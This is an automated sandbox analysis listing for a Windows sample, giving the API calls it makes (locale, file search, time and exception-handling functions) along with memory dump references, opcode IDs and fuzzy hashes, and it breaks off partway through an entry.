                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  • Opcode ID: cdb718fd106ae1039b262d2622f7438647f9320b38b050ba0d1e94779e078b1d
                                                                                  • Instruction ID: ce5594d31c2d4424f41842a088ce63c707c1ebbd5011ef6a01401214d393c701
                                                                                  • Opcode Fuzzy Hash: cdb718fd106ae1039b262d2622f7438647f9320b38b050ba0d1e94779e078b1d
                                                                                  • Instruction Fuzzy Hash: 7431C4749112299BCB61EF25DD897CDBBB9BF08310F6042EAE41CA7250EB709F858F45
                                                                                  APIs
                                                                                  • GetSystemTimePreciseAsFileTime.KERNEL32(?,0067EA53,?,?,?,?,0067EA77,000000FF,?,?,?,0067E971,00000000), ref: 0067EB88
                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,81500716,?,?,0069B30E,000000FF,?,0067EA53,?,?,?,?,0067EA77,000000FF,?), ref: 0067EB8C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$FileSystem$Precise
                                                                                  • String ID:
                                                                                  • API String ID: 743729956-0
                                                                                  • Opcode ID: 481754360e09092e6a7ea09858a3070fede29f89430a9cfac90ce86ae34e7d0d
                                                                                  • Instruction ID: 575a410fc159f935e27b6c62767ddec41094ccfcb5a84783a1df481eedff188a
                                                                                  • Opcode Fuzzy Hash: 481754360e09092e6a7ea09858a3070fede29f89430a9cfac90ce86ae34e7d0d
                                                                                  • Instruction Fuzzy Hash: D4F0A036A44554EBCB11AF44DD00B99BBAEFB49F10F01426AE81293790DB75B8008F94
                                                                                  APIs
                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0069435A,?,?,?,?,?,?,00000000), ref: 0069462C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise
                                                                                  • String ID:
                                                                                  • API String ID: 3997070919-0
                                                                                  • Opcode ID: c3c6f94d52e5d38e073efa1965dcf0ff8e9e6cee636ed40229443ecefd6ed01c
                                                                                  • Instruction ID: 89c86eba0660edd86060acee0a26d607048939401d9fe942a655cd63aded0ebf
                                                                                  • Opcode Fuzzy Hash: c3c6f94d52e5d38e073efa1965dcf0ff8e9e6cee636ed40229443ecefd6ed01c
                                                                                  • Instruction Fuzzy Hash: 11B15C711106088FDB15CF28C48AFA57BE5FF45364F268658E89ACF7A1CB35D992CB40
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0067E0AA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor
                                                                                  • String ID:
                                                                                  • API String ID: 2325560087-0
                                                                                  • Opcode ID: 3dbd1c702335d2dfd978cb689c6e0e01498261e1d2607fbc06b4b53f12e792aa
                                                                                  • Instruction ID: ad33c7d25469b25c69ce221e5c9e6ab512792a34b3414592d8521a602a1ed60c
                                                                                  • Opcode Fuzzy Hash: 3dbd1c702335d2dfd978cb689c6e0e01498261e1d2607fbc06b4b53f12e792aa
                                                                                  • Instruction Fuzzy Hash: CBA16DB1A00605CFDB18DF58D88169DBBF6FB49324F18D26AE466E7390D339A944CF60
                                                                                  APIs
                                                                                    • Part of subcall function 0068C0E0: HeapAlloc.KERNEL32(00000008,?,?,?,0068B000,00000001,00000364,?,00000005,000000FF,?,0068495A,006A56B0,0000000C), ref: 0068C121
                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00690E99
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00690F8D
                                                                                  • FindClose.KERNEL32(00000000), ref: 00690FCC
                                                                                  • FindClose.KERNEL32(00000000), ref: 00690FFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                  • String ID:
                                                                                  • API String ID: 2701053895-0
                                                                                  • Opcode ID: 6e4a59512f5a6de6ab964d0943872f19aa7e62b20e3bf9c9370a17215be2de5e
                                                                                  • Instruction ID: 0c4d508f056bb44651c858bcd3c0a0676b2d0afa5de47e121fb903026a2d822b
                                                                                  • Opcode Fuzzy Hash: 6e4a59512f5a6de6ab964d0943872f19aa7e62b20e3bf9c9370a17215be2de5e
                                                                                  • Instruction Fuzzy Hash: CC515671900208AFEF20AF689C84AFE7BBFDF85314F14419DF81997701EA30AD469B64
                                                                                  APIs
                                                                                    • Part of subcall function 0068AFB3: GetLastError.KERNEL32(?,?,0068495A,006A56B0,0000000C), ref: 0068AFB7
                                                                                    • Part of subcall function 0068AFB3: SetLastError.KERNEL32(00000000), ref: 0068B059
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00690654
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 3736152602-0
                                                                                  • Opcode ID: 222970d745bf15b32a0e6c10b19625c9c88227c5b8220d202df83d0f037f762d
                                                                                  • Instruction ID: 506a067797b505878a2cd817793c05852c66ce4d2c4d3f0310d70c5244fbecdd
                                                                                  • Opcode Fuzzy Hash: 222970d745bf15b32a0e6c10b19625c9c88227c5b8220d202df83d0f037f762d
                                                                                  • Instruction Fuzzy Hash: 6E219272615216AFFF28AB24DC41ABA73AEEF84310B10017EFD05D6641EB75ED508B54
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0
                                                                                  • API String ID: 0-4108050209
                                                                                  • Opcode ID: 40289c1567f1b6fc8dce94732f4e725fc1e3f89aecf1415469904a5eb206e6af
                                                                                  • Instruction ID: 76a2c0009131c309a60be2ecb0da3a2ef48b5557994415589f04660420cc1186
                                                                                  • Opcode Fuzzy Hash: 40289c1567f1b6fc8dce94732f4e725fc1e3f89aecf1415469904a5eb206e6af
                                                                                  • Instruction Fuzzy Hash: 60C1D0349007178FCB28EF68C5886BABBB3AF15700F14471DD69297791CB71AE45CB51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0
                                                                                  • API String ID: 0-4108050209
                                                                                  • Opcode ID: d3b274f97f4ecd0d426fbb9fd95278694e8a6b95b299200905725ca32f24b60b
                                                                                  • Instruction ID: 544c6074bc05d790f8bdf82b086717c5cc7b3990e376c1c50e82b4c583546926
                                                                                  • Opcode Fuzzy Hash: d3b274f97f4ecd0d426fbb9fd95278694e8a6b95b299200905725ca32f24b60b
                                                                                  • Instruction Fuzzy Hash: 13B1F07090060B8BCB68AF68C9B56FEBBB3AF04314F14071DD852A7791D774DA42CB45
                                                                                  APIs
                                                                                    • Part of subcall function 0068AFB3: GetLastError.KERNEL32(?,?,0068495A,006A56B0,0000000C), ref: 0068AFB7
                                                                                    • Part of subcall function 0068AFB3: SetLastError.KERNEL32(00000000), ref: 0068B059
                                                                                  • EnumSystemLocalesW.KERNEL32(0069034E,00000001,00000000,?,-00000050,?,0069013E,00000000,-00000002,00000000,?,00000055,?), ref: 00690325
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                  • String ID:
                                                                                  • API String ID: 2417226690-0
                                                                                  • Opcode ID: a776dfb7294371e33772f56d22b7563adaa91e6d53b3c22ba891dfed8d404ac5
                                                                                  • Instruction ID: c902bae767b12ebd204ca8504623379af4999cd0ad8dc948b26ee433a35a4ae6
                                                                                  • Opcode Fuzzy Hash: a776dfb7294371e33772f56d22b7563adaa91e6d53b3c22ba891dfed8d404ac5
                                                                                  • Instruction Fuzzy Hash: 1011253A2043059FEF28AF39C8916BAB797FF80358B14452DE98687F40D371B942CB40
                                                                                  APIs
                                                                                    • Part of subcall function 0068AFB3: GetLastError.KERNEL32(?,?,0068495A,006A56B0,0000000C), ref: 0068AFB7
                                                                                    • Part of subcall function 0068AFB3: SetLastError.KERNEL32(00000000), ref: 0068B059
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00690774
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 3736152602-0
                                                                                  • Opcode ID: 94d54b975f148a3d10edc4412e1981ada7833014abb1c084a1a89051a3204efa
                                                                                  • Instruction ID: 01ff6481fe95770c5abcf7067df57c642425607783c58bffe2843a2a3949629f
                                                                                  • Opcode Fuzzy Hash: 94d54b975f148a3d10edc4412e1981ada7833014abb1c084a1a89051a3204efa
                                                                                  • Instruction Fuzzy Hash: 5F110672600106AFEB14AF68DC46ABA77EDEF04320B20027AF905D7641EB78ED018B94
                                                                                  APIs
                                                                                    • Part of subcall function 0068AFB3: GetLastError.KERNEL32(?,?,0068495A,006A56B0,0000000C), ref: 0068AFB7
                                                                                    • Part of subcall function 0068AFB3: SetLastError.KERNEL32(00000000), ref: 0068B059
                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0069056A,00000000,00000000,?), ref: 006908F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 3736152602-0
                                                                                  • Opcode ID: c653e14c4b565c459662cb79bbca9d19b59b52f4ec2b3f489f949b842fd6b5ce
                                                                                  • Instruction ID: 7b8ee5e3ddaa93f453375d7abc329a298846682fd0b87fa3469e08450c3e8aad
                                                                                  • Opcode Fuzzy Hash: c653e14c4b565c459662cb79bbca9d19b59b52f4ec2b3f489f949b842fd6b5ce
                                                                                  • Instruction Fuzzy Hash: 8A01D632610112BFFF285A248C05BFA776EDB44754F154529ED4AA3A81EA70FE42CAD4
                                                                                  APIs
                                                                                    • Part of subcall function 0068AFB3: GetLastError.KERNEL32(?,?,0068495A,006A56B0,0000000C), ref: 0068AFB7
                                                                                    • Part of subcall function 0068AFB3: SetLastError.KERNEL32(00000000), ref: 0068B059
                                                                                  • EnumSystemLocalesW.KERNEL32(00690600,00000001,?,?,-00000050,?,00690106,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 006905EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                  • String ID:
                                                                                  • API String ID: 2417226690-0
                                                                                  • Opcode ID: 00424293b5b7795704b8856a9f17485c692bfff4e6997914367ee3c77c463941
                                                                                  • Instruction ID: 7a4cb9ffa42766ddcb18dd17e489f2cd384c2cf7d72177184d6439a6926ad7a7
                                                                                  • Opcode Fuzzy Hash: 00424293b5b7795704b8856a9f17485c692bfff4e6997914367ee3c77c463941
                                                                                  • Instruction Fuzzy Hash: 0CF0C8362043045FFF145F359881A7A7B9AEB80758F05452DFA4547A40D6B1AC028B54
                                                                                  APIs
                                                                                    • Part of subcall function 00687594: EnterCriticalSection.KERNEL32(?,?,0068B440,?,006A5B00,00000008,0068B332,?,?,?), ref: 006875A3
                                                                                  • EnumSystemLocalesW.KERNEL32(0068BFE3,00000001,006A5B80,0000000C,0068B948,-00000050), ref: 0068C028
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1272433827-0
                                                                                  • Opcode ID: 55352ed48389836b548eacc6649ce4a30fc9e2d2b3a5a50b828d6663332c9304
                                                                                  • Instruction ID: b6188dd1f1861a9f239a870752872e21072e12936e6e4368296fa90799770715
                                                                                  • Opcode Fuzzy Hash: 55352ed48389836b548eacc6649ce4a30fc9e2d2b3a5a50b828d6663332c9304
                                                                                  • Instruction Fuzzy Hash: 8FF04F76A50304DFD740FF98E802B5D77F2EB49725F10515AF5119B290DB7659008F54
                                                                                  APIs
                                                                                    • Part of subcall function 0068AFB3: GetLastError.KERNEL32(?,?,0068495A,006A56B0,0000000C), ref: 0068AFB7
                                                                                    • Part of subcall function 0068AFB3: SetLastError.KERNEL32(00000000), ref: 0068B059
                                                                                  • EnumSystemLocalesW.KERNEL32(00690720,00000001,?,?,?,00690160,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 0069070C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                  • String ID:
                                                                                  • API String ID: 2417226690-0
                                                                                  • Opcode ID: da6e6d8957879be736fdcd7b7eaf66bc43f59cb1ae650efc3e02d9cf0b943e28
                                                                                  • Instruction ID: 605abb9ef634bcb959a334cfa6ee934fb8308bb5a29444a6670b323fa0876c01
                                                                                  • Opcode Fuzzy Hash: da6e6d8957879be736fdcd7b7eaf66bc43f59cb1ae650efc3e02d9cf0b943e28
                                                                                  • Instruction Fuzzy Hash: 58F0553A3002045BDF14AF79DC457ABBFAAEFC1720B0B0058FA058BA80C671A843CB90
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,006862F0,?,20001004,00000000,00000002,?,?,00685202), ref: 0068BA80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: 7a91b69f5da075bb539a3e01f1d9bff12453c197c79c93b6601ef818f66d9aab
                                                                                  • Instruction ID: f39e860134bad8bae74e86b2b36b9e8eb43e17a47b11252e35562e02358cfed3
                                                                                  • Opcode Fuzzy Hash: 7a91b69f5da075bb539a3e01f1d9bff12453c197c79c93b6601ef818f66d9aab
                                                                                  • Instruction Fuzzy Hash: 25E04F31544118BBCF227F61DC08EAE3F2BEF45791F016214FD1666221CFB2A921ABD8
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000E541), ref: 0067E425
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 39baa9bd9c601b6d7f117c67c6130bbf2472f3ebf6cd20bb9e64a6e355f6f5c5
                                                                                  • Instruction ID: a4fe1335dd4ac9d8dc971747eea4f22ce80bc5648a940ac80642d0237886a393
                                                                                  • Opcode Fuzzy Hash: 39baa9bd9c601b6d7f117c67c6130bbf2472f3ebf6cd20bb9e64a6e355f6f5c5
                                                                                  • Instruction Fuzzy Hash:
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
